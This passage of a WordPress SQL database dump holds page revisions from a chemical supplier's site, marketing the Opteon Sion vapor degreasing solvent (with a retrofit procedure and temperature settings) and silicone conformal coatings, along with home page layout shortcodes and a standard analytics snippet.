trichloroethylene across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<h4><strong>What specific products can Opteon Sion Specialty Fluid replace?</strong></h4>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/vertrel-fluids/">n-Propyl Bromide (nPB)</a></li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n[ux_product_categories ids="231" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/sion/">Click here to learn more about Opteon Sion. </a>\r\n\r\nOpteon™ is  a trademark of The Chemours Company FC, LLC.', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-13 17:24:50', '2016-10-13 17:24:50', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2629, 3, '2016-10-13 17:25:12', '2016-10-13 17:25:12', '<h1><a href="https://www.miller-stephenson.com/product/sion/">Opteon™ Sion</a> - Vapor Degreasing Solvent</h1>\r\n<h4><strong>What is Vapor Degreasing?</strong></h4>\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities. Opteon™ Sion Vapor Degreasing Solvent is great for removing soils and greases from metal parts.\r\n<h4><strong>What types of industries use vapor degreasing, and where is it used?</strong></h4>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<h4><strong>What problems do manufacturers face when it comes to vapor degreasing?</strong></h4>\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n<h4><strong>What is Opteon Sion Specialty Fluid, and why are manufacturers converting to it?</strong></h4>\r\nOpteon Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide and trichloroethylene across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<h4><strong>What specific products can Opteon Sion Specialty Fluid replace?</strong></h4>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/vertrel-fluids/">n-Propyl Bromide (nPB)</a></li>\r\n 	<li>Trichloroethylene</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n[ux_product_categories ids="231" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/sion/">Click here to learn more about Opteon Sion. </a>\r\n\r\nOpteon™ is  a trademark of The Chemours Company FC, LLC.', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-13 17:25:12', '2016-10-13 17:25:12', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2630, 70, '2016-10-13 17:27:49', '2016-10-13 17:27:49', '', '', '', 'publish', 'closed', 'closed', '', '2630', '', '', '2016-10-13 17:27:49', '2016-10-13 17:27:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/2630/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2631, 71, '2016-10-13 18:01:29', '2016-10-13 18:01:29', '', '', '', 'publish', 'closed', 'closed', '', '2631', '', '', '2016-10-13 18:01:29', '2016-10-13 18:01:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/2631/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2632, 0, '2016-10-13 18:10:07', '2016-10-13 18:10:07', '', '', '', 'publish', 'closed', 'closed', '', '2632', '', '', '2016-10-13 18:10:07', '2016-10-13 18:10:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/2632/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2633, 3, '2016-10-13 18:17:34', '2016-10-13 18:17:34', '<h4><strong>Introduction to <a href="https://www.miller-stephenson.com/product/sion/">Opteon™ Sion</a> Specialty Solvent</strong></h4>\r\nOpteon™ Sion specialty solvent is suitable to replace n-propyl bromide (nPB) and trichloroethylene (TCE) in applications demanding maximum cleaning power, including defluxing; oil, grease, and wax removal; and precision cleaning applications.\r\n\r\nOpteon™ Sion specialty solvent offers an excellent balance between cleaning performance, environmental impact, and safety in use:\r\n<ul>\r\n 	<li>Excellent solvency power (KB value = 100)</li>\r\n 	<li>Superior cleaning performance</li>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n 	<li>Suitable for use with ultrasonics</li>\r\n 	<li>Existing equipment can be used with no or minor modification</li>\r\n</ul>\r\n<h4><strong><span style="color: #555555; font-size: 14.4px;">Retrofit Guideline Opteo</span><span style="color: #555555; font-size: 14.4px;">n</span><span style="color: #555555; font-size: 14.4px;">™ S</span><span style="color: #555555; font-size: 14.4px;">ion - Specialty Solvent</span></strong></h4>\r\n<h4><span style="color: #555555; font-size: 14.4px;">The following provides a summary of the basic retrofit steps for Opteon™ Sion; detailed discussion of each step is provided in this bulletin.</span></h4>\r\n<ol>\r\n 	<li>Drain current solvent from the vapor degreaser system.</li>\r\n 	<li>Replace filters.</li>\r\n 	<li>Replace desiccant bags.</li>\r\n 	<li>Wipe down tank and ensure removal of any residues.</li>\r\n 	<li>Flush the liquid lines with a small amount of Opteon™ Sion.</li>\r\n 	<li>Charge tank with recommended quantity of Opteon™ Sion.</li>\r\n 	<li>Turn on heaters and pump. Adjust heater, condensing coils, and alarm set points to the recommended temperatures.</li>\r\n</ol>\r\n<strong>RETROFIT IS COMPLETE!</strong>\r\n<h4><strong>General Retrofit Information</strong></h4>\r\nSystem Modifications\r\n\r\nIn the vast majority of cases, Opteon™ Sion will function as a drop-in for n-propyl bromide, and no modifications to existing equipment are required. Special cases where minor equipment modifications may be required are discussed below.\r\n\r\nMaterial Compatibility\r\n\r\nOpteon™ Sion is characterized by good compatibility with a wide selection of metals, including stainless steel, copper, brass, and aluminum. Opteon™ Sion is also compatible with a wide selection of plastics and elastomers, including Teflon™ PTFE, FEP, PFA, polyethylene, polypropylene, nylon, PVDF, PPS, ECTFE, and DuPont™ Kalrez® perfluoroelastomer. Examples of incompatible plastics include acrylics, ABS, polycarbonate, and polystyrene. Most elastomers including Viton™, natural rubber, EPDM, silicone, and CSPE show reversible swelling when exposed to Opteon™ Sion. Teflon™ or Teflon™ encapsulated gaskets and O-ring seals are recommended for diaphragm pumps. Individual plastic and elastomeric formulations can vary with the manufacturer; therefore, the best assurance of material compatibility can be attained via testing under conditions expected during normal operation. Contact your local technical representative for specific material compatibility concerns.\r\n\r\nFlammability\r\n\r\nOpteon™ Sion exhibits no closed cup or open cup flash point and is classified as a nonflammable liquid. The products are volatile; if allowed to evaporate and mix with air, flammable mixtures can be produced.\r\n<h4><strong>Detailed Retrofit Procedure</strong></h4>\r\n<ol>\r\n 	<li><strong>Drain n-propyl bromide from the vapor degreaser tank.</strong> The existing charge of n-propyl bromide should be completely removed from the system and collected in a suitable vessel for recycle or disposal in accordance with local requirements. Ensure that n-propyl bromide has been drained from all tanks, liquid lines, water separators, filter holders, and any other system components that are in contact with n-propyl bromide.</li>\r\n 	<li><strong>Replace filters.</strong> Change the filter during the retrofit. Standard filters employing polypropylene or PTFE media are acceptable</li>\r\n 	<li><strong>Replace desiccant bags.</strong> Change the desiccant bags during the retrofit. Type 3A molecular sieves are recommended for use in the desiccant bags; suitable desiccant bag materials include cotton. DuPont™ Tyvek® bags are not recommended.</li>\r\n 	<li><strong>Wipe down tank, and ensure removal of any residues.</strong> The <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreaser</a> tank should be thoroughly cleaned to ensure the removal of any residual n-propyl bromide and any residues present in the tank.</li>\r\n 	<li><strong>Flush the liquid lines with a small amount of Opteon™ Sion.</strong> Charge the <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreaser</a> tank with a small amount of Opteon™ Sion, and flush the liquid lines; do not allow the pump to run dry during the line flushing procedure.</li>\r\n 	<li><strong>Charge tank with recommended quantity of Opteon™ Sion.</strong> Charge the vapor degreaser tank to the liquid level recommended by the manufacturer.</li>\r\n 	<li><strong>Turn on heaters and pump.</strong> Adjust heater, condensing coils, and alarm set points to the recommended temperatures. Turn on the heaters and pumps in accordance with the equipment manufacturer’s recommended procedure. Set the condensing coil temperatures in accordance with the equipment manufacturer’s recommendations. Adjust the boil sump and alarm temperatures in accordance with the equipment manufacturer’s recommendations; Chemours recommended settings are summarized below and in Table 1.</li>\r\n</ol>\r\n<strong>Cleaning optimization may require slight adjustments to the recommended initial settings, depending upon the model of vapor degreaser employed.</strong>\r\n<ul>\r\n 	<li>Boil Sump T. Set to 5 °C (41 °F) above the boiling point of the solvent chosen.</li>\r\n 	<li>High Solvent T Alarm. Set to 10 °C (50 °F) above the boiling point of the solvent chosen.</li>\r\n 	<li>High Vapor T/Coolant Failure Alarm. Set to 5 °C (41 °F) below the boiling point of the solvent chosen.</li>\r\n 	<li>Ultrasonic Tank High T Alarm. Set to not more than 90% of boiling point of the solvent chosen.</li>\r\n</ul>\r\nTable 1. Recommended Vapor Degreaser Settings for Opteon™ Sion\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Setting</td>\r\n<td style="text-align: center;" width="206">Opteon™ Sion</td>\r\n</tr>\r\n<tr>\r\n<td>Solvent Boiling Point (°C [°F])</td>\r\n<td style="text-align: center;">47 (117)</td>\r\n</tr>\r\n<tr>\r\n<td>Boil Sump T (°C [°F])</td>\r\n<td style="text-align: center;">52 (126)</td>\r\n</tr>\r\n<tr>\r\n<td>High Solvent T Alarm (°C [°F])</td>\r\n<td style="text-align: center;">57 (135)</td>\r\n</tr>\r\n<tr>\r\n<td>Coolant Failure Alarm (°C [°F])</td>\r\n<td style="text-align: center;">42 (108)</td>\r\n</tr>\r\n<tr>\r\n<td>Ultrasonic Tank High T Alarm (°C [°F])</td>\r\n<td style="text-align: center;">43 (109)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[ux_product_categories ids="231" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/sion/">For more information regarding Opteon™ Sion please click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">For more information regarding vapor degreasing, please click here.</a>', 'Retrofit Guideline for Opteon™ Sion - Specialty Solvent', '', 'inherit', 'closed', 'closed', '', '2618-revision-v1', '', '', '2016-10-13 18:17:34', '2016-10-13 18:17:34', '', 2618, 'https://www.miller-stephenson.com/2618-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2634, 3, '2016-11-24 03:42:45', '2016-11-24 03:42:45', 'Miller-Stephenson Silicone Conformal Coatings MS- is a transparent, soft, flexible MIL-SPEC coating which offers excellent moisture resistance, good dielectric properties, and excellent light transmission capabilities for solar applications.  It has good weatherability and resistance to U.V. light and dirt pick-up.  This coating can be "solder-through" for easy repair. Contains Dow Corning 1-2577 silicone resin. This silicone resin meets the requirements of MIL-I-46058C, Type SR, IPC-CC-830B and  UL 746E approval. It is also compatible with WEEE and RoHS.\n<p class="content">Printed circuit boards (PCBs) form the foundation for electronics in automotive, consumer electronics, communications and industrial and energy applications. Yet these PCBs are often exposed to damaging environmental factors, ranging from moisture, dust and harsh chemicals to extreme thermal cycling and vibration.</p>\n<p class="content">Formulated from tough but flexible silicone technology, Miller-Stephenson Silicone Conformal Coatings promote extended service life and enhanced reliability for your PCB components and assemblies. Our industry-leading solutions have delivered proven protection for decades against moisture, service environment and a variety of harsh operating conditions includinga wide range of temperatures – from -45°C to 200°C. An additional benefit of silicone conformal coating is its excellent moisture protection.  Silicones have been used in cases where there were extreme temperature differences, which resulted in excessive moisture.  Other conformal coatings failed within hours or days, while silicone, especially when applied thickly, has been proven to succeed.  One particular application was for electronically controlled heaters developed for artic temperatures.</p>\n<p class="content">After cure, Miller-Stephenson\'s Silicone Conformal Coatings deliver dependable, long-lasting protection. Their natural elasticity also helps minimize mechanical or thermal stress on delicate component leads. Additional select grades deliver tougher, more abrasion resistant coatings ideally suited for electronic printed wiring board applications.</p>\n<p class="content"><a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a></p>\n<p class="content">More than a world-class materials supplier, Miller-Stephenson is an expert and dedicated collaborator. If our product finder cannot identify an off-the-shelf solution that meets your precise specifications or if you are looking for application expertise and support please <a href="https://www.miller-stephenson.com/tech-support/">contact us</a>.</p>', 'MS-460H', 'Miller-Stephenson&#039;s Silicone Conformal Coating is a transparent, soft, flexible coating which offers excellent moisture resistance, good dielectric properties, and excellent light transmission capabilities for solar applications.  It has good weatherability and resistance to U.V. light and dirt pick-up.  This coating can be "solder-through" for easy repair. Contains Dow Corning 1-2577 silicone resin. This silicone resin meets the requirements of MIL-I-46058C, Type SR, IPC-CC-830B and  UL 746E approva. It is also compatible with WEEE and RoHS.', 'inherit', 'closed', 'closed', '', '620-autosave-v1', '', '', '2016-11-24 03:42:45', '2016-11-24 03:42:45', '', 620, 'https://www.miller-stephenson.com/620-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2635, 3, '2016-11-24 03:45:18', '2016-11-24 03:45:18', 'Miller-Stephenson Silicone Electronic Coating ( MS-462H ) is a transparent, soft, flexible MIL-SPEC coating which offers excellent moisture resistance, good dielectric properties, and excellent light transmission capabilities for solar applications.  It has good weatherability and resistance to U.V. light and dirt pick-up.  This coating can be "solder-through" for easy repair. Contains Dow Corning 1-2577 silicone resin. This silicone resin meets the requirements of MIL-I-46058C, Type SR, IPC-CC-830B and  UL 746E approval. It is also compatible with WEEE and RoHS.\n<p class="content">Printed circuit boards (PCBs) form the foundation for electronics in automotive, consumer electronics, communications and industrial and energy applications. Yet these PCBs are often exposed to damaging environmental factors, ranging from moisture, dust and harsh chemicals to extreme thermal cycling and vibration.</p>\n<p class="content">Formulated from tough but flexible silicone technology, Miller-Stephenson\'s MS-462H Silicone Electronic Coating promote extended service life and enhanced reliability for your PCB components and assemblies. Our industry-leading solutions have delivered proven protection for decades against moisture, service environment and a variety of harsh operating conditions includinga wide range of temperatures – from -45°C to 200°C. An additional benefit of silicone conformal coating is its excellent moisture protection. Silicone Electronic Coating is used in cases where there were extreme temperature differences, which resulted in excessive moisture.  Other conformal coatings failed within hours or days, while silicone, especially when applied thickly, has been proven to succeed.  One particular application was for electronically controlled heaters developed for artic temperatures.</p>\n<p class="content">After cure, Miller-Stephenson\'s Silicone Conformal Coatings deliver dependable, long-lasting protection. Their natural elasticity also helps minimize mechanical or thermal stress on delicate component leads. Additional select grades deliver tougher, more abrasion resistant coatings ideally suited for electronic printed wiring board applications.</p>\n<p class="content"><a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a></p>\n<p class="content">More than a world-class materials supplier, Miller-Stephenson is an expert and dedicated collaborator. If our product finder cannot identify an off-the-shelf solution that meets your precise specifications or if you are looking for application expertise and support please <a href="https://www.miller-stephenson.com/tech-support/">contact us</a>.</p>', 'MS-462H', 'Miller-Stephenson’s Silicone Conformal Coating is a transparent, soft, flexible coating which offers excellent moisture resistance, good dielectric properties, and excellent light transmission capabilities for solar applications.  It has good weatherability and resistance to U.V. light and dirt pick-up.  This coating can be “solder-through” for easy repair. Contains Dow Corning 1-2577 silicone resin. This silicone resin meets the requirements of MIL-I-46058C, Type SR, IPC-CC-830B and  UL 746E approva. It is also compatible with WEEE and RoHS.', 'inherit', 'closed', 'closed', '', '732-autosave-v1', '', '', '2016-11-24 03:45:18', '2016-11-24 03:45:18', '', 732, 'https://www.miller-stephenson.com/732-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2636, 72, '2016-10-13 19:59:04', '2016-10-13 19:59:04', '', '', '', 'publish', 'closed', 'closed', '', '2636', '', '', '2016-10-13 19:59:04', '2016-10-13 19:59:04', '', 0, 'https://www.miller-stephenson.com/nf_sub/2636/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2637, 0, '2016-10-13 21:33:40', '2016-10-13 21:33:40', '', '', '', 'publish', 'closed', 'closed', '', '2637', '', '', '2016-10-13 21:33:40', '2016-10-13 21:33:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/2637/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2638, 2, '2016-10-14 01:55:14', '2016-10-14 01:55:14', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Large Inventory</h3>\r\nWith four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&lt;script&gt;\r\n(function(i,s,o,g,r,a,m){i[\'GoogleAnalyticsObject\']=r;i[r]=i[r]||function(){\r\n(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\r\nm=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\r\n})(window,document,\'script\',\'https://www.google-analytics.com/analytics.js\',\'ga\');\r\n\r\nga(\'create\', \'UA-85712101-1\', \'auto\');\r\nga(\'send\', \'pageview\');\r\n\r\n&lt;/script&gt;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-10-14 01:55:14', '2016-10-14 01:55:14', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2639, 2, '2016-10-14 01:55:41', '2016-10-14 01:55:41', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Large Inventory</h3>\r\nWith four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Low Global 